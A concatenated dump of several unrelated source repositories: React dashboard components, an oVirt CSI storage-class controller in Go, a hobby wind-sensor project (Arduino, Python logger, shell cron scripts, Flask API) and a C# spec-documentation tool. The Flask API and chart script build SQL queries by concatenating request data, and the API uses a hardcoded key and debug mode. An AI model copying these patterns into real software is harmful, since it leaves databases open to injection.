<div className={styles.searchBarDiv}>
<div className={styles.searchAndDrop}>
<div>
<div className={styles.searchBar}>
<SearchIcon />
<TextField
id="standard-search"
label="Search..."
type="search"
InputProps={{ disableUnderline: true }}
/>
</div>
</div>
<div className={styles.dropDownDiv}>
<Dropdown
isOpen={dropdownOpen}
toggle={toggle}
style={{ borderColor: "#D7DAE2" }}
>
<DropdownToggle
caret
style={{
backgroundColor: "white",
color: "#A4AFB7",
}}
>
Status
</DropdownToggle>
<DropdownMenu>
<DropdownItem header>Actions</DropdownItem>
<DropdownItem>Some Action</DropdownItem>
<DropdownItem>Action</DropdownItem>
<DropdownItem>Foo Action</DropdownItem>
<DropdownItem>Bar Action</DropdownItem>
<DropdownItem>Quo Action</DropdownItem>
</DropdownMenu>
</Dropdown>
<Button
variant="contained"
style={{
backgroundColor: "#43425D",
color: "white",
borderRadius: "17px",
textTransform: 'none'
}}
>
Search
</Button>
</div>
</div>
<div>
<Button
variant="contained"
style={{
backgroundColor: "#F2134F",
color: "white",
borderRadius: "5px",
fontSize: "15px",
textTransform: 'none'
}}
>
Add new organisation
</Button>
</div>
</div>
<div className={styles.table}>
<Table />
</div>
<div style={{ paddingTop:'2%',display: 'flex', flexDirection: 'row', justifyContent: 'flex-end' }}>
<Pagination count={10} variant="outlined" shape="rounded" color='primary'/>
</div>
</div>
</div>
);
}
<file_sep>import React from "react";
import { makeStyles, withStyles } from "@material-ui/core/styles";
import styles from "./AuditJob.module.css";
import InputLabel from "@material-ui/core/InputLabel";
import FormControl from "@material-ui/core/FormControl";
import Select from "@material-ui/core/Select";
import DatePicker from "../../../../../../components/DatePicker/DatePicker";
import Card from "@material-ui/core/Card";
import CardContent from "@material-ui/core/CardContent";
import back from "./back.png";
import Dropdown from "../../../../../../components/Select/Select";
import Typography from "@material-ui/core/Typography";
const useStyles = makeStyles({
root: {
maxWidth: "45%",
minWidth: "40%",
},
title: {
fontSize: 14,
},
pos: {
marginBottom: "10",
},
});
export default function Initialisation() {
const classes = useStyles();
const [state, setState] = React.useState({
age: "",
name: "hai",
});
const handleChange = (event) => {
const name = event.target.name;
setState({
...state,
[name]: event.target.value,
});
};
const normalise = (value) => value / 10;
return (
<div className={styles.main}>
<div className={styles.header}>
<div className={styles.title}>
<span style={{ fontWeight: "light", color: "#43425D" }}>
Operations /
</span>
<span style={{ fontWeight: "lighter", color: "#BBBBBB" }}>
Job Reporting
</span>
</div>
<div className={styles.dropdownMain}>
<Dropdown holder="Audit Job" />
</div>
</div>
<div className={styles.header2}>
<span className={styles.subTitle}>Audit Job</span>
<div className={styles.dropdown2}>
<Dropdown holder="Today" />
</div>
<div className={styles.date}>
<span className={styles.label}>From Date</span>
<DatePicker width="80%" />
<span className={styles.label}>To Date</span>
<DatePicker width="80%" />
</div>
</div>
<div className={styles.cards}>
<Card className={classes.root}>
<CardContent>
<Typography
className={classes.pos}
style={{
color: "#03E565",
textAlign: "center",
fontSize: "xx-large",
fontWeight: "bold",
paddingBottom: "5%",
}}
>
500
</Typography>
</CardContent>
<Typography
style={{
color: "#BBBBBB",
textAlign: "center",
fontSize: "110%",
}}
gutterBottom
>
The number of properties sent into reattempt per day
</Typography>
</Card>
<Card className={classes.root}>
<CardContent>
<Typography
className={classes.pos}
style={{
color: "#FF6060",
textAlign: "center",
fontSize: "xx-large",
fontWeight: "bold",
paddingBottom: "5%",
}}
>
188
</Typography>
</CardContent>
<Typography
style={{
color: "#BBBBBB",
textAlign: "center",
alignItems: "center",
fontSize: "110%",
}}
gutterBottom
>
Total Pending properties with reattempt till now
</Typography>
</Card>
</div>
<div className={styles.final}>
<span
className={styles.label}
style={{
fontWeight: "bold",
cursor: "pointer",
fontSize: "large",
}}
>
View Full Details
</span>
<img src={back} />
</div>
</div>
);
}
<file_sep>import React, { useState } from 'react'
import styles from './SamadhanIDViewAll.module.css'
import { Dropdown, DropdownToggle, DropdownMenu, DropdownItem } from 'reactstrap';
import { makeStyles } from '@material-ui/core/styles';
import Button from '@material-ui/core/Button';
import TextField from '@material-ui/core/TextField';
import SearchIcon from '@material-ui/icons/Search';
import Table from '../../../../components/Table/Table'
const useStyles = makeStyles((theme) => ({
root: {
'& > *': {
margin: theme.spacing(1),
},
'& .MuiTextField-root': {
margin: theme.spacing(1),
width: '25ch',
},
},
}));
export default function OrganisationSamadhanID() {
const classes = useStyles();
const [dropdownOpen, setDropdownOpen] = useState(false);
const toggle = () => setDropdownOpen(prevState => !prevState);
return (
<div className={styles.main}>
<div className={styles.title}>
<span style={{ fontWeight: 'bolder' }}>Samadhan ID /</span>
<span style={{ fontWeight: 'bolder'}}> Blank Samadhan ID /</span>
<span style={{ fontWeight: 'lighter', color: 'gray' }}>View All</span>
</div>
<div className={styles.tableDiv}>
<div className={styles.searchBarDiv}>
<div>
<div className={styles.searchBar}>
<SearchIcon />
<TextField id="standard-search" label="Search..." type="search" />
</div>
</div>
<div className={styles.dropDownDiv}>
<Dropdown isOpen={dropdownOpen} toggle={toggle}>
<DropdownToggle caret style={{ backgroundColor: 'white', color: 'grey' }}>
Organisation
</DropdownToggle>
<DropdownMenu>
<DropdownItem header>Actions</DropdownItem>
<DropdownItem>Some Action</DropdownItem>
<DropdownItem>Action</DropdownItem>
<DropdownItem>Foo Action</DropdownItem>
<DropdownItem>Bar Action</DropdownItem>
<DropdownItem>Quo Action</DropdownItem>
</DropdownMenu>
</Dropdown>
<Button variant="contained" style={{ backgroundColor: '#21034B', color: 'white', borderRadius: '20px' }}>
Search
</Button>
</div>
<div>
<Button variant="contained" color="secondary">
Secondary
</Button>
</div>
</div>
<div className={styles.table}>
<Table />
</div>
</div>
</div>
)
}
<file_sep>import React from "react";
import { makeStyles, withStyles } from "@material-ui/core/styles";
import styles from "./Initialisation.module.css";
import InputLabel from "@material-ui/core/InputLabel";
import FormControl from "@material-ui/core/FormControl";
import Select from "@material-ui/core/Select";
import DatePicker from "../../../../../../components/DatePicker/DatePicker";
import Card from "@material-ui/core/Card";
import CardContent from "@material-ui/core/CardContent";
import back from "./back.png";
import LinearProgress from "@material-ui/core/LinearProgress";
import Dropdown from "../../../../../../components/Select/Select";
import Typography from "@material-ui/core/Typography";
const BorderLinearProgress = withStyles((theme) => ({
root: {
height: 5,
borderRadius: 5,
paddingTop: "2%",
},
colorPrimary: {
backgroundColor: "#DFDFDF",
},
bar: {
borderRadius: 5,
backgroundColor: (props) => props.color,
padding: "2%",
},
}))(LinearProgress);
const useStyles = makeStyles({
root: {
maxWidth: "30%",
minWidth: "30%",
},
title: {
fontSize: 14,
},
pos: {
marginBottom: "12",
},
});
export default function Initialisation() {
const classes = useStyles();
const [state, setState] = React.useState({
age: "",
name: "hai",
});
const handleChange = (event) => {
const name = event.target.name;
setState({
...state,
[name]: event.target.value,
});
};
const normalise = (value) => value / 10;
return (
<div className={styles.main}>
<div className={styles.header}>
<div className={styles.title}>
<span style={{ fontWeight: "light", color: "#43425D" }}>
Operations /
</span>
<span style={{ fontWeight: "lighter", color: "#BBBBBB" }}>
Job Reporting
</span>
</div>
<div className={styles.dropdownMain}>
<Dropdown holder="Initialisation" />
</div>
</div>
<div className={styles.header2}>
<span className={styles.subTitle}>Initialisation</span>
<div className={styles.dropdown2}>
<Dropdown holder="Today" />
</div>
<div className={styles.date}>
<span className={styles.label}>From Date</span>
<DatePicker width="80%" />
<span className={styles.label}>To Date</span>
<DatePicker width="80%" />
</div>
</div>
<div className={styles.cards}>
<Card className={classes.root}>
<CardContent>
<Typography
className={classes.title}
style={{
color: "#BBBBBB",
textAlign: "center",
fontSize: "large",
whiteSpace: "nowrap",
}}
gutterBottom
>
Number of jobs created
</Typography>
<Typography
className={classes.pos}
style={{
color: "#03E565",
textAlign: "center",
fontSize: "33px",
fontWeight: "bold",
paddingBottom: "5%",
}}
>
500
</Typography>
<BorderLinearProgress
variant="determinate"
value={normalise(500)}
color="#03E565"
style={{
backgroundColor: "#DFDFDF",
}}
/>
</CardContent>
</Card>
<Card className={classes.root}>
<CardContent>
<Typography
className={classes.title}
style={{
color: "#BBBBBB",
textAlign: "center",
fontSize: "large",
whiteSpace: "nowrap",
}}
gutterBottom
>
Total number of cards initialised
</Typography>
<Typography
className={classes.pos}
style={{
color: "#56BBFE",
textAlign: "center",
fontSize: "33px",
fontWeight: "bold",
paddingBottom: "5%",
}}
>
247
</Typography>
<BorderLinearProgress
variant="determinate"
value={normalise(247)}
color="#56BBFE"
style={{
backgroundColor: "#DFDFDF",
}}
/>
</CardContent>
</Card>
<Card className={classes.root}>
<CardContent>
<Typography
className={classes.title}
style={{
color: "#BBBBBB",
textAlign: "center",
fontSize: "large",
whiteSpace: "nowrap",
}}
gutterBottom
>
Total number of cards Quarantined
</Typography>
<Typography
className={classes.pos}
style={{
color: "#FF6060",
textAlign: "center",
fontSize: "33px",
fontWeight: "bold",
paddingBottom: "5%",
}}
>
188
</Typography>
<BorderLinearProgress
variant="determinate"
value={normalise(188)}
color="#FF6060"
style={{
backgroundColor: "#DFDFDF",
}}
/>
</CardContent>
</Card>
</div>
<div className={styles.final}>
<span
className={styles.label}
style={{
fontWeight: "bold",
cursor: "pointer",
fontSize: "large",
}}
>
View Full Details
</span>
<img src={back} />
</div>
</div>
);
}
| bd176271eba5022ec23d3fdb596a6fa3170b1b47 | [
"JavaScript"
] | 4 | JavaScript | starwiz-7/reactjs-application | 49ecce02811515798e9dd53c428180cd727d2218 | a5799df3d29bc73df4ee323c2d7e4a1b3a41c984 |
refs/heads/master | <repo_name>csrwng/ovirt-csi-driver-operator<file_sep>/go.mod
module github.com/ovirt/csi-driver-operator
go 1.16
require (
github.com/go-bindata/go-bindata v3.1.2+incompatible
github.com/google/gofuzz v1.2.0 // indirect
github.com/openshift/api v0.0.0-20210521075222-e273a339932a
github.com/openshift/build-machinery-go v0.0.0-20210423112049-9415d7ebd33e
github.com/openshift/client-go v0.0.0-20210521082421-73d9475a9142
github.com/openshift/library-go v0.0.0-20210618134649-ef142b5ac039
github.com/ovirt/go-ovirt v0.0.0-20201023070830-77e357c438d5
github.com/prometheus/client_golang v1.7.1
github.com/spf13/cobra v1.1.1
github.com/spf13/pflag v1.0.5
golang.org/x/text v0.3.5 // indirect
gopkg.in/yaml.v2 v2.4.0
k8s.io/api v0.21.1
k8s.io/apimachinery v0.21.1
k8s.io/client-go v0.21.1
k8s.io/component-base v0.21.1
k8s.io/klog/v2 v2.8.0
)
<file_sep>/pkg/operator/storageclass_controller.go
package operator
import (
"context"
"fmt"
"github.com/openshift/library-go/pkg/controller/factory"
"github.com/openshift/library-go/pkg/operator/events"
"github.com/openshift/library-go/pkg/operator/resource/resourceapply"
"github.com/openshift/library-go/pkg/operator/v1helpers"
"github.com/ovirt/csi-driver-operator/internal/ovirt"
ovirtsdk "github.com/ovirt/go-ovirt"
corev1 "k8s.io/api/core/v1"
storagev1 "k8s.io/api/storage/v1"
apierrors "k8s.io/apimachinery/pkg/api/errors"
metav1 "k8s.io/apimachinery/pkg/apis/meta/v1"
"k8s.io/client-go/kubernetes"
"k8s.io/klog/v2"
)
type OvirtStrogeClassController struct {
operatorClient v1helpers.OperatorClient
kubeClient kubernetes.Interface
kubeInformersForNamespace v1helpers.KubeInformersForNamespaces
eventRecorder events.Recorder
ovirtClient *ovirt.Client
nodeName string
}
func NewOvirtStrogeClassController(operatorClient v1helpers.OperatorClient,
kubeClient kubernetes.Interface,
kubeInformersForNamespace v1helpers.KubeInformersForNamespaces,
ovirtClient *ovirt.Client,
nodeName string,
eventRecorder events.Recorder) factory.Controller {
c := &OvirtStrogeClassController{
operatorClient: operatorClient,
kubeClient: kubeClient,
eventRecorder: eventRecorder,
ovirtClient: ovirtClient,
nodeName: nodeName,
}
return factory.New().WithSync(c.sync).WithSyncDegradedOnError(operatorClient).WithInformers(
operatorClient.Informer(),
kubeInformersForNamespace.InformersFor("").Storage().V1().StorageClasses().Informer(),
).ToController("OvirtStorageClassController", eventRecorder)
}
func (c *OvirtStrogeClassController) sync(ctx context.Context, syncCtx factory.SyncContext) error {
sdName, err := c.getStorageDomain(ctx)
if err != nil {
klog.Errorf(fmt.Sprintf("Failed to get Storage Domain name: %v", err))
return err
}
storageClass := generateStorageClass(sdName)
existingStorageClass, err := c.kubeClient.StorageV1().StorageClasses().Get(ctx, storageClass.Name, metav1.GetOptions{})
if err != nil {
if !apierrors.IsNotFound(err) {
klog.Errorf(fmt.Sprintf("Failed to issue get request for storage class %s, error: %v", storageClass.Name, err))
return err
}
} else {
klog.Info(fmt.Sprintf("Storage Class %s already exists", existingStorageClass.Name))
storageClass = existingStorageClass
}
_, _, err = resourceapply.ApplyStorageClass(c.kubeClient.StorageV1(), c.eventRecorder, storageClass)
if err != nil {
klog.Errorf(fmt.Sprintf("Failed to apply storage class: %v", err))
return err
}
return nil
}
func (c *OvirtStrogeClassController) getStorageDomain(ctx context.Context) (string, error) {
get, err := c.kubeClient.CoreV1().Nodes().Get(ctx, c.nodeName, metav1.GetOptions{})
if err != nil {
klog.Errorf(fmt.Sprintf("Failed to get node: %v", err))
return "", err
}
nodeID := get.Status.NodeInfo.SystemUUID
conn, err := c.ovirtClient.GetConnection()
if err != nil {
klog.Errorf(fmt.Sprintf("Connection to ovirt failed: %v", err))
return "", err
}
vmService := conn.SystemService().VmsService().VmService(nodeID)
attachments, err := vmService.DiskAttachmentsService().List().Send()
if err != nil {
klog.Errorf(fmt.Sprintf("Failed to fetch attachments: %v", err))
return "", err
}
for _, attachment := range attachments.MustAttachments().Slice() {
if attachment.MustBootable() {
d, err := conn.FollowLink(attachment.MustDisk())
if err != nil {
klog.Errorf("Failed to follow disk: %v", err)
return "", err
}
disk, ok := d.(*ovirtsdk.Disk)
klog.Info(fmt.Sprintf("Extracting Storage Domain from disk: %s", disk.MustId()))
if !ok {
klog.Errorf(fmt.Sprintf("Failed to fetch disk: %v", err))
return "", err
}
s, err := conn.FollowLink(disk.MustStorageDomains().Slice()[0])
if err != nil {
klog.Errorf("Failed to follow Storage Domain: %v", err)
return "", err
}
sd, ok := s.(*ovirtsdk.StorageDomain)
klog.Info(fmt.Sprintf("Fetched Storage Domain %s", sd.MustName()))
if !ok {
klog.Errorf(fmt.Sprintf("Failed to fetch Storage Domain: %v", err))
return "", err
}
return sd.MustName(), nil
}
}
return "", nil
}
func generateStorageClass(storageDomainName string) *storagev1.StorageClass {
reclaimPolicy := corev1.PersistentVolumeReclaimDelete
expected := &storagev1.StorageClass{
ObjectMeta: metav1.ObjectMeta{
Name: "ovirt-csi-sc",
Namespace: defaultNamespace,
},
TypeMeta: metav1.TypeMeta{
Kind: "StorageClass",
APIVersion: "storage.k8s.io/v1",
},
Provisioner: instanceName,
Parameters: map[string]string{"storageDomainName": storageDomainName, "thinProvisioning": "true"},
ReclaimPolicy: &reclaimPolicy,
MountOptions: []string{},
AllowVolumeExpansion: boolPtr(true),
}
expected.Annotations = map[string]string{
"storageclass.kubernetes.io/is-default-class": "true",
}
return expected
}
func boolPtr(val bool) *bool {
return &val
}
| 6d0b2666364ff1843751c1acde4f0224dcbcbfb1 | [
"Go",
"Go Module"
] | 2 | Go Module | csrwng/ovirt-csi-driver-operator | 125fbf8af234b0aeea50c4bea714c7525f4899ef | 73c9a456408488f435154cabeb3a5eedfe492eb3 |
refs/heads/master | <file_sep>#!/bin/bash
source ~/.bashrc
# Set up crontab
if ! crontab -l | grep -q run_output_log.sh; then
crontab -l > curr_cron
echo '0 0 * * 0 /home/pi/ws/wind_sensor/rasp/run_output_log.sh >> /home/pi/ws/wind_sensor/rasp/log.txt' >> curr_cron
crontab curr_cron
rm curr_cron
fi
if ! crontab -l | grep -q post_output_log.sh; then
crontab -l > curr_cron
echo '0 * * * * /home/pi/ws/wind_sensor/rasp/post_output_log.sh >> /home/pi/ws/wind_sensor/rasp/log.txt' >> curr_cron
crontab curr_cron
rm curr_cron
fi
# Kill existing output_log.py process
echo "Killing existing output log process"
ps -ef | grep output_log.py | awk '{print $2}' | xargs kill -9
sleep 5
echo "Start new output log proces"
# Start new output_log.py process
nohup python3 /home/pi/ws/wind_sensor/pyserial/output_log.py >> log.txt 2>&1 &
<file_sep>import argparse, sys
from datetime import datetime
import mysql.connector
import plotly.graph_objects as go
import numpy as np
import os
mydb = mysql.connector.connect(
host="localhost",
user="wind_sensor",
passwd="<PASSWORD>",
database="wind_sensor_db"
)
mycursor = mydb.cursor(buffered=True)
def validate_date(date_text):
try:
if date_text != datetime.strptime(date_text, "%Y%m%d").strftime('%Y%m%d'):
raise ValueError
return True
except ValueError:
return False
def validate_hour(hour_text):
try:
if hour_text != datetime.strptime(hour_text, "%Y%m%d-%H").strftime('%Y%m%d-%H'):
raise ValueError
return True
except ValueError:
return False
def mean(l):
return float(sum(list(map(int, l))))/float(len(list(map(int, l))))
def generate_daily_report(day):
mycursor.execute("SELECT * FROM wind_sensor_data WHERE capture_time LIKE '" + day + "%';")
data = np.array(list(mycursor.fetchall()))
if (len(data) == 0):
return True
x = data[:,0]
y = data[:,1]
hourly_y = []
curr_hour_mark = x[0][:11]
hourly_x = [datetime.strptime(curr_hour_mark, "%Y%m%d-%H")]
curr_hour_values = []
for i in range(len(x)):
if x[i][:11] != curr_hour_mark:
curr_hour_mark = x[i][:11]
hourly_y.append(mean(curr_hour_values))
hourly_x.append(datetime.strptime(curr_hour_mark, "%Y%m%d-%H"))
curr_hour_values = []
curr_hour_values.append(y[i])
fig = go.Figure()
fig.add_trace(go.Scatter(x=hourly_x,y=hourly_y,name="Normalised hourly values"))
fig.update_layout(
title = 'Wind speed data for date ' + day,
xaxis = dict(
title = 'Time',
titlefont_size=16,
tickfont_size=14,
),
yaxis=dict(
title = 'Wind speed unit',
titlefont_size=16,
tickfont_size=14,
)
)
fig.write_html(os.getenv("HOME") + "/ws/wind_sensor/gcp/charts/daily/" + day + ".html")
with open(os.getenv("HOME") + "/ws/wind_sensor/gcp/stats/day", "w") as f:
f.write(str("%.2f" % mean(y)))
def generate_hourly_report(hour):
mycursor.execute("SELECT * FROM wind_sensor_data WHERE capture_time LIKE '" + hour + "%';")
data = np.array(list(mycursor.fetchall()))
if (len(data) == 0):
return True
x = [datetime.strptime(t, '%Y%m%d-%H:%M') for t in data[:,0]]
y = data[:,1]
fig = go.Figure()
fig.add_trace(go.Bar(x=x,y=y,name="Minute values"))
fig.update_layout(
title = 'Wind speed data for hour ' + hour,
xaxis = dict(
title = 'Time',
titlefont_size=16,
tickfont_size=14,
),
yaxis=dict(
title = 'Wind speed unit',
titlefont_size=16,
tickfont_size=14,
)
)
fig.write_html(os.getenv("HOME") + "/ws/wind_sensor/gcp/charts/hourly/" + hour + ".html")
with open(os.getenv("HOME") + "/ws/wind_sensor/gcp/stats/hour", "w") as f:
f.write(str("%.2f" % mean(y)))
if __name__=="__main__":
parser = argparse.ArgumentParser(description="Input date or hour to proceed with chart generation")
parser.add_argument("--day", type=str, help="Generate chart based on given date.", default="NA")
parser.add_argument("--hour", type=str, help="Generate chart based on given hour.", default="NA")
args = parser.parse_args()
if (args.day == "NA" and args.hour =="NA") or (args.day != "NA" and args.hour !="NA"):
print("Please supply only one parameter (day or hour)")
sys.exit(1)
if (args.day != "NA"):
if not validate_date(args.day):
print("Incorrect day format received. Must be %Y%m%d")
sys.exit(1)
generate_daily_report(args.day)
if (args.hour != "NA"):
if not validate_hour(args.hour):
print("Incorrect hour format received. Must be %Y%m%d-%H")
sys.exit(1)
generate_hourly_report(args.hour)
<file_sep># make a script that runs on raspberry pi start up, to output windspeed to log + upload to cloud
# tbc
<file_sep>import serial
from datetime import datetime
ser = serial.Serial('/dev/ttyACM0')
print(ser.name)
while(1):
hour = datetime.now().strftime("%Y%m%d-%H")
minute = datetime.now().strftime("%Y%m%d-%H:%M")
filename = "/home/pi/ws/wind_sensor/pyserial/logs/windspeed-" + hour + ".txt"
with open(filename, "a") as f:
f.write(minute + "," + str(ord(ser.read())) + "\n")
<file_sep>#!/bin/bash
source ~/.bashrc
source ~/ws/wind_sensor/gcp/wind_sensor/bin/activate
day=$(date +"%Y%m%d")
hour=$(date +"%Y%m%d-%H")
python $HOME/ws/wind_sensor/gcp/generate_charts.py --day="$day" >> $HOME/ws/wind_sensor/gcp/log.txt
python $HOME/ws/wind_sensor/gcp/generate_charts.py --hour="$hour" >> $HOME/ws/wind_sensor/gcp/log.txt
if [ -f $HOME/ws/wind_sensor/gcp/charts/daily/$day.html ] ; then
cp $HOME/ws/wind_sensor/gcp/charts/daily/$day.html $HOME/ws/wind_sensor/gcp/templates/current_day.html
else
cp $HOME/ws/wind_sensor/gcp/charts/daily/default.html $HOME/ws/wind_sensor/gcp/templates/current_day.html
fi
if [ -f $HOME/ws/wind_sensor/gcp/charts/hourly/$hour.html ] ; then
cp $HOME/ws/wind_sensor/gcp/charts/hourly/$hour.html $HOME/ws/wind_sensor/gcp/templates/current_hour.html
else
cp $HOME/ws/wind_sensor/gcp/charts/hourly/default.html $HOME/ws/wind_sensor/gcp/templates/current_hour.html
fi
<file_sep>from flask import Flask, request, render_template
import mysql.connector
from datetime import datetime
import os
mydb = mysql.connector.connect(
host="localhost",
user="wind_sensor",
passwd="<PASSWORD>",
database="wind_sensor_db"
)
mycursor = mydb.cursor(buffered=True)
app = Flask(__name__)
def validate_date(date_text):
try:
if date_text != datetime.strptime(date_text, "%Y%m%d-%H:%M").strftime('%Y%m%d-%H:%M'):
raise ValueError
return True
except ValueError:
return False
@app.route("/", methods=['GET'])
def home():
day = open(os.getenv("HOME") + "/ws/wind_sensor/gcp/stats/day", "r").read()
hour = open(os.getenv("HOME") + "/ws/wind_sensor/gcp/stats/hour", "r").read()
return "<h1>Oscar's wind sensor data</h1><p><h4>Today's average reading is " + day + " units.</h4><p><a href='day'>Today's sensor data</a><p><h4>Last hour's average reading is " + hour + " units.</h4><p><a href='hour'>Last hour's sensor data</a>"
@app.route("/day", methods=['GET'])
def day():
return render_template('current_day.html')
@app.route("/hour", methods=['GET'])
def hour():
return render_template('current_hour.html')
@app.route("/", methods=['POST'])
def update_db():
data = request.get_data().split("\n")
if len(data) < 2:
print("no data received")
return "no data received\n"
if (data[-1] != "&api-key=dev"):
print("incorrect api key received")
return "incorrect api key received\n"
# Update database entry, overwrite if required
for row in data:
if len(row.split(",")) == 2 and validate_date(row.split(",")[0]):
[capture_time, value] = row.split(",")
print("processing " + capture_time + "," + str(value))
mycursor.execute('INSERT INTO wind_sensor_data (capture_time, value) VALUES ("' + capture_time + '","' + str(value) + '") ON DUPLICATE KEY UPDATE value="' + str(value) + '";')
else:
print("not processing row " + str(row))
mydb.commit()
print("post request received successfully")
return "post request received successfully\n"
if __name__ == '__main__':
app.run(host='0.0.0.0', port='5100', debug=True)
<file_sep>int numOfSwitches = 0;
bool switchRegister = false;
unsigned long time = millis();
void setup() {
//start serial connection
Serial.begin(9600);
//configure pin 2 as an input and enable the internal pull-up resistor
pinMode(2, INPUT_PULLUP);
}
void loop() {
//read the pushbutton value into a variable
int sensorVal = digitalRead(2);
if (switchRegister != sensorVal)
{
switchRegister = sensorVal;
numOfSwitches++;
}
if (millis() - time >= 60000)
{
Serial.write(numOfSwitches);
time = millis();
numOfSwitches = 0;
}
}
<file_sep># wind_sensor
my balcony wind sensor project
arduino folder to be run on arduino
processing folder contains processing IDE script that can be run on my PC to read arduino output. Unfortunately couldn't get this to work on raspberry pi. Installed oracle java 8 according to https://askubuntu.com/questions/56104/how-can-i-install-sun-oracles-proprietary-java-jdk-6-7-8-or-jre, and installed processing-3.5.3 for linux 32 bit, but I still can't get the .pde script to run either on processing GUI or in headless mode.
so instead I'll use pyserial on raspberry pi to read arduino output. Funnily I didn't pick this initially just because it wasn't working on my main PC, I couldn't detect the right USB port there, but it's working on my arduino.
use raspberry scripts to scp processing output to my google cloud. Find a way to run this on raspberry pi start up
use gcp files to process the received log files, and make the data available on API. Set up auto emailing mechanism
display data either on hourly or daily basis. Pregenerate charts to make things easier. Allow on demand generation.
could prettify output by using some kind of reactjs front end
why don't we just output from arduino once per minute, and then just post directly from python. no need to post the python output log
<file_sep>#!/bin/bash
source ~/.bashrc
source ~/ws/wind_sensor/gcp/wind_sensor/bin/activate
ps -ef | grep flask_api.py | awk '{print $2}' | xargs kill -9
echo Starting flask_api.py
nohup python $HOME/ws/wind_sensor/gcp/flask_api.py >> log.txt 2>&1 &
<file_sep>#!/bin/bash
source ~/.bashrc
date
cd /home/pi/ws/wind_sensor/pyserial/logs/
for log in $(ls *txt); do
rm tmp
curl --data-binary "@$log" 172.16.58.3:5100 -d "api-key=dev" > tmp 2>&1
if grep "post request received successfully" tmp; then
echo "post success"
mv $log $log.posted$(date +"%H%M%S")
rm tmp
else
echo "post fail"
fi
done
| 675aa386ebd51970bcd804a506a7c88cab060dd2 | [
"Markdown",
"Python",
"C++",
"Shell"
] | 10 | Shell | tienlongoc/wind_sensor | 624835175e1ff1cf4264a77099adf2674fe5a22d | ccb9479a6d7b29af47108c140f0fe3c9892b089f |
refs/heads/master | <file_sep>var gulp = require('gulp');
var sass = require('gulp-sass');
var autoprefixer = require('gulp-autoprefixer');
gulp.task('express', function () {
var express = require('express');
var app = express();
app.use(require('connect-livereload')());
app.use(express.static(__dirname));
app.listen(3000, 'localhost');
});
var tinylr;
gulp.task('livereload', function () {
tinylr = require('tiny-lr')();
tinylr.listen(35729);
});
function notifyLiveReload(event) {
var fileName = require('path').relative(__dirname, event.path);
tinylr.changed({
body: {
files: [fileName]
}
});
}
gulp.task('sass', function () {
return gulp.src('style.scss')
.pipe(sass().on('error', sass.logError))
.pipe(gulp.dest(__dirname));
});
gulp.task('autoprefix', function () {
return gulp.src('style.css')
.pipe(autoprefixer({
browsers: ['last 2 versions']
}))
.pipe(gulp.dest(__dirname));
});
gulp.task('watch', function () {
gulp.watch('index.html', notifyLiveReload);
gulp.watch('style.css', notifyLiveReload);
gulp.watch('style.css', ['autoprefix']);
gulp.watch('app.js', notifyLiveReload);
gulp.watch('style.scss', ['sass']);
});
gulp.task('default', ['express', 'livereload', 'watch'], function () {
});
<file_sep>(function ($) {
function geneWord (voyProb, wordProb) {
var word = false;
var text = '';
alphab1 = 'aeiouy';
alphab2 = 'zrtpqsdfghjklmwxcvbn';
while (!word) {
if (Math.random() < voyProb) {
text += alphab1.charAt(Math.floor(Math.random() * alphab1.length));
} else {
text += alphab2.charAt(Math.floor(Math.random() * alphab2.length));
}
if (Math.random() < wordProb) {
word = true;
}
}
text += ' ';
return text;
}
function geneText () {
for (var i = 0; i < 400; i++) {
$('.text p').append(geneWord(voyProb, wordProb));
}
}
var voyProb = 0.60;
var wordProb = 0.38;
$('#startBtn').on('click', function () {
geneText();
});
$('#clearBtn').on('click', function () {
$('.text p').html('');
});
})(jQuery);
| a37249ba8331d1f8d6dfe53a054974862775170f | [
"JavaScript"
] | 2 | JavaScript | Zyyol/GulpBaseProject | 8323605c0a0167bf1221506b018d1084b92a5aca | b711dde197820a53eaa211d1a54562005aa6a121 |
refs/heads/main | <repo_name>mokhan/spec.dox<file_sep>/trunk/product/Spec.Dox/Presentation/Views/IReportPublisher.cs
using System.IO;
namespace Spec.Dox.Presentation.Views
{
public interface IReportPublisher
{
void Publish(string expected_html, string test_assembly_path);
}
public class ReportPublisher : IReportPublisher
{
public void Publish(string html_to_publish, string test_assembly_path)
{
var pathToWriteReportTo = Path.Combine(new FileInfo(test_assembly_path).DirectoryName, "report.html");
File.WriteAllText(pathToWriteReportTo, html_to_publish);
System.Console.Out.WriteLine("Report published to... {0}", pathToWriteReportTo);
}
}
}<file_sep>/README.md
spec.dox
========
A library for generating html documentation from your c# test suites.
<file_sep>/trunk/product/Spec.Dox/Domain/MethodDecoratedBySpecificationAttributeSpecs.cs
using System.Reflection;
using MbUnit.Framework;
using Spec.Dox.Test;
using Spec.Dox.Test.Extensions;
using Spec.Dox.Test.MetaData;
using Spec.Dox.Utility.Core;
namespace Spec.Dox.Domain
{
public class MethodDecoratedBySpecificationAttributeSpecs {}
[Concern(typeof (MethodIsDecoratedBySpecificationAttribute))]
public class when_checking_if_a_method_is_decorated_with_an_attribute_that_it_is_decorated_with :
context_spec<ISpecification<MethodInfo>>
{
bool result;
MethodInfo methodToInspect;
protected override ISpecification<MethodInfo> EstablishContext()
{
methodToInspect = GetType().GetMethod("should_return_true");
return new MethodIsDecoratedBySpecificationAttribute("TestAttribute");
}
protected override void Because()
{
result = sut.IsSatisfiedBy(methodToInspect);
}
[Test]
public void should_return_true()
{
result.should_be_equal_to(true);
}
}
[Concern(typeof (MethodIsDecoratedBySpecificationAttribute))]
public class when_checking_if_a_method_is_decorated_with_an_attribute_that_it_is_not :
context_spec<ISpecification<MethodInfo>>
{
bool result;
MethodInfo methodToInspect;
protected override ISpecification<MethodInfo> EstablishContext()
{
methodToInspect = GetType().GetMethod("should_return_false");
return new MethodIsDecoratedBySpecificationAttribute("SerializableAttribute");
}
protected override void Because()
{
result = sut.IsSatisfiedBy(methodToInspect);
}
[Test]
public void should_return_false()
{
result.should_be_equal_to(false);
}
}
}<file_sep>/trunk/product/Spec.Dox/Domain/Repositories/ITestContextRepository.cs
using System.Collections.Generic;
using System.Linq;
using System.Reflection;
namespace Spec.Dox.Domain.Repositories
{
public interface ITestContextRepository
{
IEnumerable<ITestContext> All(string path_to_assembly);
}
public class TestContextRepository : ITestContextRepository
{
ITypeContainsSpecifications criteria;
public TestContextRepository() : this(new TypeContainsSpecifications()) {}
public TestContextRepository(ITypeContainsSpecifications criteria)
{
this.criteria = criteria;
}
public IEnumerable<ITestContext> All(string path_to_assembly)
{
return Assembly
.LoadFrom(path_to_assembly)
.GetTypes()
.Where(type => criteria.IsSatisfiedBy(type))
.Select(type => new TestContext(type))
.Cast<ITestContext>()
;
}
}
